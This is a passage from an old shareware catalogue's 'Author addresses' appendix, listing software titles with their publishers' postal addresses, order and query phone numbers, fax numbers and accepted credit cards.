Express, MasterCard, Optima, Visa + Fax: 313-981-3615 + + Product: Grow'Em + Author: Paul Postuma + Address: 16 Fullyer Drive, Quispamsis, N.B., E2G 1Y7 CANADA + Queries: 506-849-7087 + + Product: The Electronic Square + Author: Electronic Creativity Products [David Archer] + Address: P.O. Box 1734, Lynnwood, WA 98046 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 206-778-4013 + + Appendix A, "Author addresses" 651 + + + + Product: Contact Browser + Author: Moore Software Solutions [Ric Moore] + Address: P.O. Box 501783, San Diego, CA 92150-1783 + Orders & queries: 619-672-1479 + Fax: 619-672-1479 + + Product: Safe Program + Author: Regnoc Software + Address: PO Box 1253, San Ramon, CA 94583 + Orders: 800-242-4775 (orders only, please) + Accepts: Discover, MasterCard, Visa + Fax: 713-524-6398 + Queries: 510-806-0713 + + Product: Computer Dictionary + Author: Gary FitzGerald + Address: 553 Haverstraw Rd., Suffern, NY 10901 + Orders & queries: 914-357-4171 + + Products: Anim. Multiplication & Division, Animated Alphabet, + Animated Bugs, Animated Clock, Animated Math, Animated Memory + Game, Animated Money, Animated Shapes, Animated VGA Memory + Game, Animated Words + Author: FLIX Productions + Address: 601 Ranch Road, DelValle, TX 78617 + + Products: Program Group Specialist, RI-VB Database Toolkit + v1.1, RUF100.ZIP, SLIB10.ZIP + Author: MIS Resources International [Wayne Edwards] + Address: 570 Colonial Park Drive, Ste 301, Roswell, GA 30075 + Orders & queries: 404-594-7500 + Fax: 404-587-1932 + + Product: Button Manager for Windows + Author: AKC Applied Knowledge Corporation [Darin Ellis] + Address: 6128 Red Willow Drive, Orleans, Ontario K1C 7J8 + CANADA + Orders: 800-2424-PSL (orders only, please) + Fax: 713-524-6398 + Queries: 613-841-6020 + + Product: Silver Wolf Desktop + Author: Silver Wolf Software + Address: P.O. Box 4232, Laguna Beach, CA 92652 + Accepts: MasterCard, Visa + + Appendix A, "Author addresses" 652 + + + + Product: Free System Resources + Author: Chet Williams + Address: 1737 Peyton Ave. 'K', Burbank, CA 91504 + Orders & queries: 818-954-9128 + + Product: MOZART (Virtuoso Edition) + Author: David Webber + Address: 484 Warrington Rd, Culcheth, Warrington, WA3 5RA + UNITED KINGDOM + + Product: Chores & Rewards + Author: K. Jeff Hayes + Address: 1055 Business Highway 64 East, P.O. Box 1459, Wendell + NC 27591 + Orders & queries: 919-365-6027 + Fax: 919-365-6082 + + Product: SuperSet - Environment Extender + Author: Ross Leidy + Address: 1966 Staunton Road, Cleveland Heights, OH 44118 + + Product: ENTER-EASE + Author: KAYL SOFTWARE + Address: 8380 Northgate Ave. #25, Canoga Park, CA 91304 + Orders: 800-242-4775 (orders only, please) + Accepts: MasterCard, Visa + + Product: Screen Saver Sampler + Author: Damsel Software Group + Address: P.O. Box 713, Concord, NH 03302-0713 + Orders & queries: 603-485-2677 + Fax: 603-485-2677 + + Product: Hubble + Author: Hubble Software Company [Griengsak Narasirisinlapa] + Address: P.O. Box 1654, Denton, TX 76202 + + Products: ASTRO, ASTRO For Windows, CJNFonts, NUMERO UNO, SCP + Author: Christopher J. Noyes Software [Christopher J. Noyes] + Address: 144 Union Street, Store A, Brooklyn, NY 11231 + Orders & queries: 718-625-2262 + Accepts: MasterCard, Visa + Fax: 718-625-6766 + + Products: SmartDraw, SmartDraw 95 + Author: SmartDraw Software Inc. + Address: 9974 Scripps Ranch Blvd #35, San Diego, CA 92131 + Orders: 800-501-0314 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 619-549-2830 + Queries: 619-549-0314 + + Appendix A, "Author addresses" 653 + + + + Products: AA-Array.DLL, AAVBSORT.DLL + Author: AA-Software International + Address: 12 ter Domaine Du Bois Joli, 06330 Roquefort-Les-Pins, + FRANCE + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: +33-93-77-19-78 + + Product: Business Clock Link + Author: BizMark Development [Mark Hicks] + Address: P.O. Box 182, Princeton, LA 71067 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 318-949-4400 + Queries: 318-949-4399 + + Product: Disk Piecharter + Author: Zorn Software [Hans Zorn] + Address: Overtoom 529 1054 LK, Amsterdam, THE NETHERLANDS + Orders: +31-206189658 (orders only, please) + Accepts: Discover, MasterCard, Visa + Fax: +31-206189658 + + Product: Flexitime/Time Logging + Author: HJS Systems + Address: 15 Falcon Close, Nuneaton, CV11 6TE UNITED KINGDOM + Orders & queries: +44-(0)1203-388031 + Fax: +44-(0)1203-352326 + + Products: Day By Day, Dear Diary, Little Black Book, q&dBase + for Windows, Teach Your Children, WebForms, WinBrowse, + WInvoices + Author: Q&D Software Development [Dave Verschleiser] + Address: 10-B Sentinel Court, Chatham, NJ 07928 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Queries: 201-635-1824 + + Products: Ancient Yacht, A Day at the Races, Math Bingo + Author: LatticeWork Software + Address: P.O. Box 362, Lafayette Hill, PA 19444 + + Product: CS/AMORT + Author: Computer Solutions, Inc. + Address: 850 S. Rancho Drive #2264, Las Vegas, NV 89106 + + Products: COMpanion, DRIVEMAP + Author: Oxford House Software [Steve Leonard] + Address: 160 Oxford Way, Santa Cruz, CA 95060 + + Product: File Finder/Grouper + Author: EnGamma + Address: 2407 Cameron Mills Rd., Alexandria, VA 22302-3302 + Queries: 703-548-6869 + + Appendix A, "Author addresses" 654 + + + + Product: Basketball Statistics + Author: Gentle Productions + Address: P.O. Box 152, Shelby, MI 49455 + Orders & queries: 616-861-5157 + Accepts: MasterCard, Visa + + Product: Relor Rhyming Dictionary + Author: Doyle Bare + Address: 710 Silver Spur Rd. #119, Rolling Hills Estates, CA + 90274 + Orders & queries: 310-519-8049 + + Products: Crypto!, FSave, TimeClock + Author: KMR Consulting [Kenneth A. Reek] + Address: 3090 Griffin Rd, Churchville, NY 14428 + Orders & queries: 716-293-3241 + + Product: New Menus for Windows + Author: Dipl.Ing. Roger Rene Kommer + Address: Doernbergstr. 11, D-34119 Kassel, GERMANY + Orders: 800-414-4268 (orders only, please) + Accepts: Discover, MasterCard, Visa + Fax: 910-350-2937 + Queries: 910-791-7052 + + Products: Loan Master, PCLoan5 + Author: Bottom Line Software, Inc. + Address: P.O. Box 118826, Carrollton, TX 75011-8826 + Orders & queries: 214-394-4087 + Accepts: MasterCard, Visa + Fax: 214-394-4170 + + Product: REALIZE + Author: Transcendental Technologies + Address: 17 Beechwood cl., East Doncaster, Victoria 3109 + AUSTRALIA + + Product: PhotoPat + Author: Rainbow Scan, Inc. + Address: 135 Beech Lake Court, Roswell, GA 30076 + Orders & queries: 404-642-7515 + + Products: AMF Daily Planner & P.I.M., AMF Intelligent Organ for + Win, AMF Multimedia Jukebox (WIN), AMF'S WINFAX PRO 4.0 MACRO, + Business Cards for Word 6.0, CD Player for Word 6.0, Chicago- + Like Windows Titlers, Colored Toolbar Icons for Word, Elbow + Grease for Windows v1.0, Exit Master for Word 6.0, French + Dictionary for Word 6.0, Mouse Clock (tm) for Windows, P.I.M. + for Word 6.0 for Windows, Toolbar 2X for Word 6.0, Ultimate + Faxer for Word 6.0, Wordware v4.0a for WinWord 6 + Author: AMF [Andrew M. Freeman] + Address: P.O. Box 189, Holbrook, NY 11741-0189 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Appendix A, "Author addresses" 655 + + + + Products: JRE Home Inventory, My Life, Win Change, Win Multiple + Configurations, Writer's Cramp + Author: JRE Enterprises + Address: P.O. Box 5643, Mesa, AZ 85211-5643 + + Product: Beam Cookbook + Author: SoftEngineering + Address: 1278 Glenneyre Street #185, Laguna Beach, CA 92651 + Queries: 714-497-3952 + + Product: TRAINING MANAGEMENT SYSTEM + Author: Oscar Wenholm + Address: RR 1 Box 11, Raymond, SD 57258 + Orders & queries: 605-532-3479 + + Product: SC-Scripter + Author: SplitCycle Computing + Address: 13102 Rivergate Lane, Jacksonville, FL 32223 + Orders & queries: 904-292-4770 + + Product: Spanish Helper Level One + Author: G.B. Blanchard + Address: Aptdo. de Correos 555, 29680 Estepona, Malaga SPAIN + Orders: 800-445-3346 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 218-228-5879 + Queries: 212-598-4939 + + Product: MEGIK + Author: Advanced Topics + Address: v.XXV Aprile 9/B, 10045 Piossasco, (TO) ITALY + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 39-11-323607 + + Product: The Lawyer's DeskTop + Author: DataPro Enterprises, Inc. + Address: 11200 Westheimer, Suite 923, Houston, TX 77042 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 713-493-5429 + Queries: 713-978-7431 + + Appendix A, "Author addresses" 656 + + + + Product: NoteWorthy + Author: Braeburn Software [Bernard Hill] + Address: Hawthorn Bank, Scott's Place, Selkirk TD7 4DP + SCOTLAND + Orders & queries: +44-1750-721854 + Accepts: MasterCard, Visa + + Products: CrabWise, Search-N-Store + Author: Shawn Anderson SoftWare + Address: PO Box 1481, Milan, IL 61264 + Orders & queries: 309-787-4967-(X227) + Fax: 309-787-8351 + + Product: Katelin Comment Manager + Author: Katelin, Inc. + Address: 610 N. Main, Georgetown, IL 61846 + Orders & queries: 217-662-6780 + + Products: Windows Gourmet, WINstall + Author: Dovcom + Address: P.O. Box 580, Provo, UT 84603-0580 + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 801-221-4527 + + Product: Photo Show 3D + Author: Progressive Logic [Keith A. Marshall] + Address: P.O. Box 561420, Charlotte, NC 28256-1420 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Product: File Manager Jr. + Author: Charles R. Maher + th + Address: 409 North 18 Street, Coeur d'Alene, ID 83814-5460 + Orders: 800-215-3688 (orders only, please) + Accepts: MasterCard, Visa + Fax: 208-664-9743 + Queries: 208-664-3864 + + Appendix A, "Author addresses" 657 + + + + Products: I&M USA, INSTINDX, INSTSPEC, Sales & Samples + Author: C T Johnson, Inc + Address: 8126 Forestdale Dr., Charlotte, NC 28227 + Orders & queries: 704-568-9598 + Fax: 704-532-1236 + + Product: Property Master + Author: MSdataBase Solutions + Address: 614 Warrenton Terrace NE, Leesburg, VA 22075 + Orders & queries: 703-777-5660 + Accepts: Discover, MasterCard, Visa + Fax: 703-777-5440 + + Product: Zip Pro + Author: Synaptek Software + Address: 1188 Ostler Ct, Mississauga, ON L5C 3G6 CANADA + Orders: 800-465-7047 (orders only, please) + Accepts: MasterCard, Visa + Fax: 905-897-7622 + Queries: 905-276-8835 + + Products: Examine, ExamineZip, PentaBlox + Author: Aquila Software [Trevor Poile] + Address: P O Box 137, Tunbridge Wells, Kent TN4 0YN UNITED + KINGDOM + Orders & queries: +44-(0)1892-531108 + + Product: RADIOSIM + Author: BREMENSON [Claude BREMENSON] + Address: 60 rue d'Herblay, 95150 Taverny, FRANCE + Accepts: MasterCard, Visa + Fax: 33-1-39-32-11-97 + + Product: RPF Zip Control + Author: RPF Software [Frank B. Fortson] + Address: P.O. Box 420457, Atlanta, GA 30342 + Fax: 404.250.0282 + + Product: BESTHES + Author: LANGUAGE SOFTWARE Co. + Address: POB 3080, Beersheva 84130 ISRAEL + Accepts: MasterCard, Visa + Fax: 972-7-433-103 + + Appendix A, "Author addresses" 658 + + + + Product: Landscape Explorer + Author: WoolleySoft + Address: Humblesknowe Cottage, Ramoyle, Dunblane, Perthshire + FK15 0BA SCOTLAND + Orders & queries: 0786-825406 + + Product: Water and Steam Properties + Author: Katmar Software [Harvey Wilson] + Address: PO Box 654, Westville 3630, SOUTH AFRICA + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Product: FundRaiser Basic + Author: Professional Support Software [Gene Weinbeck] + Address: 106 Garfield Ave, PO Box 901, West Plains, MO 65775 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 417-256-6370 + Queries: 417-256-4280 + + Product: GAKUSEI + Author: Barham Software + Address: 15507 S. Normandie Ave. #245, Gardena, CA 90247-4028 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 310-327-4862 + + Product: Activity Monitor + Author: Louis Desjardins + Address: 6142 16 Avenue, Montreal, Quebec H1X 2S8 CANADA + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Product: DO + Author: RobiNets [Larrie Hutton] + Address: 2300 Harvard Way, 130-G, Reno, NV 89502 + Orders & queries: 702-827-4682 + + Product: RMS-III: Ref.Mgn.Sys. + Author: Mulberry Software, Inc. + Address: 234 Mulberry Place, Ridgewood, NJ 07450-1617 + Fax: 201-670-1680 + Queries: 201-670-9856 + + Product: Mystic Pixels + Author: Tesuji Technology [Ronald G. White] + Address: P.O. Box 4305, Boulder, CO 80306-4305 + + Product: Wall Street Simulator - Windows + Author: Larax Software + Address: PO Box 606, Sherman, CT 06784 + + Appendix A, "Author addresses" 659 + + + + Product: LOTTO MANIA + Author: Robert O. Leafloor + Address: P.O. Box 72161, Kanata, Ontario K2K 2P4 CANADA + Orders & queries: 613-591-5525-(HOME) + + Products: Backup, Card Flash, Color Fun, Declaration of War, + Early Bird, EZinst, Hang Man, Medieval War, Medieval War Door, + Wndlib + Author: Burnham Park Software, Inc. + Address: P.O. Box #814, Chicago, IL 60690-0814 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 312-922-6313 + + Product: MCBase + Author: Harry Doldersum + Address: Weerselose straat 26, 7623 DA Borne., THE NETHERLANDS + Orders: 800-2424-PSL (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: NL-(0)74-2668480 + + Products: FF Business Cards, FF Designer Envelopes, FF Graphics + Conversion Utility, Financial Freedom, Financial Freedom + Billing Mgr., Financial Freedom GOLD + Author: M & R Technologies, Inc. + Address: P.O. Box 061298, Palm Bay, FL 32906-1298 + Orders & queries: 407-951-2268 + Fax: 407-951-2268 + + Product: LAPC - Loan Advisor for the PC + Author: J.D. Consulting Associates + Address: P.O. Box 3794, Albany, NY 12203 + Orders & queries: 518-482-5789 + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 518-371-1102 + + Product: BusinessCards for Windows + Author: Michael Dvorkin + Address: 1111 Bayhill Drive #180, San Bruno, CA 94066 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 415-588-6149 + Queries: 415-588-6215 + + Product: SCAN + Author: EZ Software [John Veit] + th + Address: 1222 144 St SE, Mill Creek, WA 98012 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Appendix A, "Author addresses" 660 + + + + Products: RoboCrap.v94, TURF.v93 + Author: Second Career Software + Address: P.O. Box 283, Sierra Vista, AZ 85636-0283 + Orders: 800-242-4775 (orders only, please) + + Product: Musical Instrument Tuner + Author: SoundByte Software [Jeff O'Dair] + Address: 5907 Mendenhall Road, Indianapolis, IN 46221 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 317-856-3860 + + Products: EMS4C Library, LZW Data Compr. Lib for Windows, LZW + Data Compression for C, LZW Data Compression for Pascal, + Personal Com Lib for PowerBASIS, Personal Comm Lib for BASIC, + Personal Comm Lib for Pascal, Personal Comm Lib for Windows, + Personal Comm Library for C, Personal Protocol Lib 4 Pascal, + Personal Protocol Lib for C/C++, Serial File Copy + Author: MarshallSoft Computing, Inc. + Address: PO Box 4543, Huntsville, AL 35815 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 713-524-6398 + Queries: 205-881-4630 + + Products: FAXHAVEN, HQ-FAX (1-Step High Quality FAX + Author: HTF Consulting [H. Thomas FONES] + Address: 436 Whitehall Rd. #F, Alameda, CA 94501 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 800-9-SENDFH + Queries: 510-521-1689 + + Products: RRKeyCaps & RRKeySampler (PST1), RRKeyCaps & + RRKeySampler (TT), RRKeyCapsGerman (PST1), RRKeyCapsGerman + (TT), RRMacCaps & RRKeySampler (PST1), RRMacCaps & RRKeySampler + (TT) + Author: RoadRunner Computing [Elizabeth A. Swoope] + Address: P.O. Box 21635, Baton Rouge, LA 70894-1635 + Orders & queries: 504-928-0780 + Accepts: MasterCard, Visa + Fax: 504-928-0802 + + Product: National INNdex + Author: Nelson's Computer Services [Greg Nelson] + Address: PO Box 2601, Glenview, IL 60025 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 708-965-7325 + + Appendix A, "Author addresses" 661 + + + + Product: MegaWord + Author: Merlot International [Romke Soldaat] + Address: 1 ch des Moulines, 34230 St. Bauzille de la Sylve, + FRANCE + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: (+1)-314-966-1833 + Queries: (+1)-314-965-5630 + + Product: DDE Requester for Win3.x & NT + Author: Westerdale AG [Simon Westerdale] + Address: Florastrasse 34, 4600 Olten, SWITZERLAND + Orders & queries: 41-62-260935 + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 41-62-260936 + + Products: Minefield For Everybody, Tangram + Author: Judah Warshaw + Address: P.O. Box 27054, Jerusalem 91270, ISRAEL + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: +972-2-830-001 + + Products: CULTURAL AWARENESS, MERLIN'S MATH, WRITE CHINESE + Author: Awareness Productions [Thomas Yee] + Address: P.O. Box 261262, Plano, TX 75026-1262 + Queries: 214-517-0279 + + Product: Contact-Lens! + Author: Kruse Control Software + Address: 30 Ridge Road, Suite 21, Ridgewood, NJ 07450 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 201-670-0677 + + Products: Grammar Expert, Spelling Sentry, WStyle + Author: Wintertree Software Inc. + Address: 43 Rueter St., Nepean, Ontario K2J 3Z9 CANADA + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 613-825-6271 + + Products: FontBook Professional, Report Utility for Paradox/DOS + Author: The C Group, Inc. [Mark Cohen] + Address: 1254 Rockaway Parkway, Ste. #252, Brooklyn, NY 11236 + Orders & queries: 718-251-1891 + Fax: 718-251-2059 + + Product: WinDatCon + Author: Vogel Scientific Software + Address: 1199 Leeward Ave., Lake Elmo, MN 55042-9643 + + Appendix A, "Author addresses" 662 + + + + Product: MEG SYSTEM INFO GRAPHS PIE 3-D + Author: Jim Tolliver + Address: P.O. Box 4071, Stamford, CT 06907-0071 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 203-322-0298 + + Product: LPRINT + Author: Paragon Innovations, Inc. [Michael R. Wilkinson] + Address: 202 N. Allen Dr., Suite A, Allen, TX 75002 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 214-390-2965 + + Product: Notice Board + Author: Cornerstone Software Limited [Chris Tyler] + Address: 45 Shay Lane, Hale Barns, Altrincham, Cheshire WA15 + 8PA UNITED KINGDOM + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 01044-61-904-8145 + Queries: 01044-61-904-8143 + + Product: SQWEZ + Author: JM Software + Address: 568 Greenwich Ave., Paulsboro, NJ 08066 + Orders & queries: 609-423-1989 + + Products: AdMaker, Fonter, MultiLabel, Prompter - Speaker's + Utility, Rockford!, WinClip + Author: OsoSoft [George Campbell] + Address: 1472 Sixth Street, Los Osos, CA 93402 + Orders & queries: 805-528-1759 + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 805-528-3074 + + Product: League Manager + Author: Al Dodd Software Co. + Address: 1615 Rachel Lane, Lakeland, FL 33805 + Orders & queries: 813-683-4210 + + Products: Inspect & Install for Windows, Local Access Logon + Author: M2w Software [Mart van Ineveld] + Address: Po.O box 8158, 3009 ad Rotterdam, THE NETHERLANDS + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: +31-104568845 + + Appendix A, "Author addresses" 663 + + + + Product: DAZZLE + Author: Worldwide MicroTronics, Inc. + Address: P O Box 8759, Spring, TX 77387-8759 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 713-367-4333 + Queries: 713-298-1698 + + Products: Kith and Kin, TreeDraw + Author: SpanSoft [Nick J Hunter] + Address: 11 Rowan Terrace, Cowdenbeath, Fife KY4 9JZ, SCOTLAND + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: +44-(0)1383-510597 + Queries: +44-(0)1383-510597 + + Products: APT Mailing Assistant, APT Mailing Assistant (OS/2), + Keyed File System (DOS), Keyed File System (OS/2) + Author: APT Computer Solutions, Inc. + Address: P.O. Box 47, Versailles, KY 40383-0047 + Orders & queries: 606-873-0589 + Accepts: MasterCard, Visa + + Products: A MUSICAL TUTORIAL, A MUSICAL TUTORIAL for Windows + Author: R. Swerdfeger + Address: 3453 Marydale Ave., Cornwall, Ontario K6K 1P6 CANADA + Orders & queries: 613-933-7871 + + Product: wfListen + Author: Prodigy Computing + Address: PO Box 2194, Cramerview 2060 SOUTH AFRICA + Orders: 011-27-11-886-7122 (orders only, please) + Accepts: MasterCard, Visa + Fax: 011-27-11-888-2370 + + Product: Visual Calendar Planner + Author: Bok Nan Lo + Address: P.O. Box 9132, Reno, NV 89507 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 713-524-6398 + + Product: EDGEFLOW + Author: Pacestar Software [John Daleiden] + Address: P.O. Box 51974, Phoenix, AZ 85076-1974 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Product: WinTickler + Author: Logic Pulse + Address: 26 Mallard Dr., Groton, CT 06340 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Appendix A, "Author addresses" 664 + + + + Products: Z & Z Color, Z & Z Puzzle + Author: Z & Z Software + Address: 1511 Norman Avenue, Lutherville, MD 21093 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 713-524-6394 + Queries: 410-561-3891 + + Products: Bike, Heart Smart, Postit for Windows, Rolodeck, + Yellow Sticky for Windows 4.5 + Author: Henning Associates [Michael R. Henning] + Address: Rt. 2, Box 526-A, 4542 Doylesville Rd., Crozet, VA + 22932-9518 + Orders: 800-823-6896 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 804-823-6896 + + Product: PROGRAM ENTITY ORGANIZER + Author: James W. Young & Associates, Inc. + Address: 1403 Fifth Street, Suite G, Davis, CA 95616 + Orders: 800-745-6903 (orders only, please) + Queries: 916-756-4976 + + Product: Edens-for-two + Author: Martlet, Inc. + Address: PO Box 37, Herndon, VA 22070 + Orders & queries: 703-435-5767 + + Product: Personal Finances 2 + Author: Spitfire Software + Address: 325 Breakwater Ridge, Atlanta, GA 30328 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 713-524-6398 + Queries: 404-257-0187 + + Product: Music Sculptor for Windows + Author: Aleph Omega Software + Address: Box 61085 Kensington Postal Outlet, Calgary, Alberta + T2Z 1W8 CANADA + Orders: 800-2424-PSL (orders only, please) + Queries: 403-257-2115 + + Products: CrossWords, Econ's Arena, Equatron, Finders Keepers + Author: Glen DeBiasa + Address: 356 Gemini Drive, Apt. 4, Somerville, NJ 08876 + + Appendix A, "Author addresses" 665 + + + + Product: Seascape + Author: Advanced Computer Tektonics [Alan Walworth] + Address: 334 State Street, Suite 106, Los Altos, CA 94022 + Orders & queries: 415-424-1403 + + Product: TreePlan for DOS + Author: Decision Support Services [Michael R. Middleton] + Address: 2105 Buchanan Street #1, San Francisco, CA 94115 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 415-673-6217 + Queries: 415-673-6217 + + Products: File Finder for Windows, Task Scheduler for DOS + Author: Simian Id Software [Don Branson] + Address: P.O. Box 430011, St. Louis, MO 63143 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 314-781-8709 + + Products: Resume Master Deluxe, The Right Resume, Thoroughbred + Handicapper Pro + Author: Whirlwind Technologies [James S Nixon] + Address: P.O. Box 1063, Van, TX 75790 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Products: Alad_IRQ, CTS Serial Port Utilities + Author: Computer Telecommunication Systems, Inc. [John Jerrim] + Address: 3847 Foxwood Road, Suite 1000, Duluth, GA 30136-6100 + Orders & queries: 404-263-8623 + Accepts: Discover, MasterCard, Visa + Fax: 404-263-0124 + + Product: EDITEUR + Author: Jean-Pierre Menicucci + Address: 18 rue de Brest, apt 243 - 35000, Rennes, FRANCE + Orders: +1-(212)-598-4459 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: +1-(212)-228-5879 + + Appendix A, "Author addresses" 666 + + + + Product: Image'n'Bits + Author: Bananas Software Inc + Address: 29 Engle Rd, Paramus, NJ 07652 + Orders & queries: 201-265-9855 + + Product: NewBase + Author: GWN Software [Gerald Manweiler] + Address: #17 Blueberry Drive, Whitecourt, Alberta T7S 1G7 + CANADA + Orders & queries: 403-778-5028 + + Product: Super!Market + Author: Trulli Tops Software, Inc. + Address: 7749 Ridgeway Dr., Mentor, OH 44060 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 216-974-5189 + + Product: REFILE + Author: MegAS Corporation + Address: 12401 Brookshire Parkway, Suite 200, Carmel, IN 46033 + Orders & queries: 317-844-6380 + + Product: CD-Box + Author: Jeffrey Belt + Address: 2A Crothers Hall, Stanford, CA 94305 + Queries: 415-497-5573 + + Product: CDPlayer for Windows and DOS + Author: Jupiter Software [Paul Brace] + Address: 63 Parkside, Wimbledon, London, SW19 5NL ENGLAND + Orders & queries: +44-081-946-4826 + Accepts: MasterCard, Visa + Fax: +44-081-879-0090 + + Product: New Testament for Windows + Author: Rocky Mountain Laboratories + Address: P.O. Box 272224, Fort Collins, CO 80527 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 303-669-2166 + Queries: 303-679-1662 + + Product: SysChk + Author: Advanced Personal Systems [Paul Griffith] + Address: 105 Serra Way, Suite 418, Milpitas, CA 95035 + Fax: 408-945-0242 + Queries: 408-298-3703 + + Products: HELLLP!, Pink Bunny, RACONTEX + Author: Guy Software [Ed Guy, P.Eng, CDP] + Address: 1752 Duchess Avenue, West Vancouver, BC V7V 1P9 + CANADA + + Appendix A, "Author addresses" 667 + + + + Product: TOP + Author: TNC Technology [Tom Beikirch & Leon Williams] + Address: 1084 Webster Road, Webster, NY 14580 + Orders & queries: 716-872-1377 + Fax: 716-872-1377 + + Product: A Batch View + Author: Robin R. Latham + Address: P.O. Box 16152, Fort Worth, TX 76162 + Orders & queries: 817-263-4056 + Fax: N + + Product: Top Draw + Author: Top Software + Address: P.O. Box 1141, Conifer, CO 80433 + Orders & queries: 303-838-0384 + Accepts: MasterCard, Visa + Fax: 303-838-0384 + + Product: Schooner + Author: Jonathan Cook + Address: 7034 N. Cedar Ave. #108, Fresno, CA 93720 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 209-299-4958 + Queries: 209-299-4950 + + Products: SPANISH DRILL!, TURBO TPU TOOLKIT! + Author: LONE WOLF ENTERPRISES [John A. Jackson] + rd + Address: 1507 E. 53 Street #438, Chicago, IL 60615 + Orders: 312-734-4549 (orders only, please) + + Products: Jokes & Quotes, QUIK-INSTALL + Author: Michael L. Wester + Address: Route #6 Box 34, Fuquay-Varina, NC 27526 + Orders & queries: 919-552-0767 + Accepts: MasterCard, Visa + Fax: 919-362-8254 + + Products: Disk Drive Cleaner, Master Disk, Rosenthal UnInstall, + Rosenthal WinLite, System Monitor, Virus Simulator + Author: Rosenthal Engineering [Doren Rosenthal] + Address: P.O.Box 1650, San Luis Obispo, CA 93406 + Queries: 805-541-0910 + + Appendix A, "Author addresses" 668 + + + + Products: Contact Manager, Service Call Manager + Author: CPI computer services + Address: 325 Magnolia Way, Lemmon Valley, NV 89506 + Orders & queries: 702-329-6868 + Fax: 702-972-1659 + + Product: TreeChart + Author: FineLine Software + Address: Newtown, Kinvara, Co. Galway, IRELAND + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: (+353)-91-37560 + Queries: (+353)-91-37560 + + Product: MicroCook + Author: NORSKi Software + Address: P.O. Box 76, Franksville, WI 53126-0076 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 414-632-9815 + + Products: Convert It!(tm) SE, Periodic Table, Zippidy Do Da(tm) + Author: SMI Corporation + Address: P.O. Box 582221, Tulsa, OK 74158 + Orders & queries: 918-241-2301 + Accepts: MasterCard, Visa + Fax: 918-241-2301 + + Product: Winvelope + Author: Winvelope Software + Address: P.O. Box 1145, Jenkins, KY 41537-1145 + Accepts: 